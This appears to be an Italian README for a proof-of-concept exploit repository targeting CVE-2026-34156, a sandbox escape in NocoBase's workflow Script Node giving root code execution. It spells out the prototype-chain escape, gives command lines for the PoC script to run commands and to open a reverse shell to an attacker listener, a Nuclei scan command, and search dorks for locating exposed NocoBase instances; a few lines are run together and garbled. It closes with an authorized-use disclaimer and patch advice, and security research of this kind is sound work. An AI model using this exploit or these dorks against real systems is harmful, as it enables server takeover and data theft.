
CVE-2026-34156
Da non autenticato / privilegi bassi → Esecuzione Remota di Codice come root in NocoBase
CVE-2026-34156 è una vulnerabilità critica di evasione dalla sandbox in NocoBase (una piattaforma open-source no-code/low-code).
Un attaccante in grado di creare o eseguire un Workflow Script Node (anche con privilegi limitati) può evadere dalla sandbox vm di Node.js e ottenere piena Esecuzione Remota di Codice come root all'interno del container.
@nocobase/plugin-workflow-javascript (Script Node)console._stdout.constructor.constructoruid=0)fs)L'oggetto console passato nella sandbox proviene dal realm host, consentendo agli attaccanti di risalire la catena dei prototipi e accedere al vero costruttore Function → process.mainModule.require.
# Simple command execution
python3 CVE-2026-34156.py -u https://target.com -e [email protected] -p password -c "id"
# Reverse shell
python3 CVE-2026-34156.py -u https://target.com -r 192.168.1.100:4444
Il repository include: script PoC completo, template Nuclei e checker sicuro.
nuclei -u https://target -t cves/CVE-2026-34156.yaml
title="NocoBase" || title="Sign in - NocoBase"
title="NocoBase" && body="workflow"
isolated-vm) in produzione.
Questo repository è destinato esclusivamente a scopi educativi e di ricerca sulla sicurezza autorizzata.
Usalo solo su sistemi di tua proprietà o per i quali hai ricevuto esplicita autorizzazione scritta a effettuare test.
Lo sfruttamento non autorizzato è illegale.
Fatto con ❤️ per la community di sicurezza
Resta al sicuro. Applica le patch subito.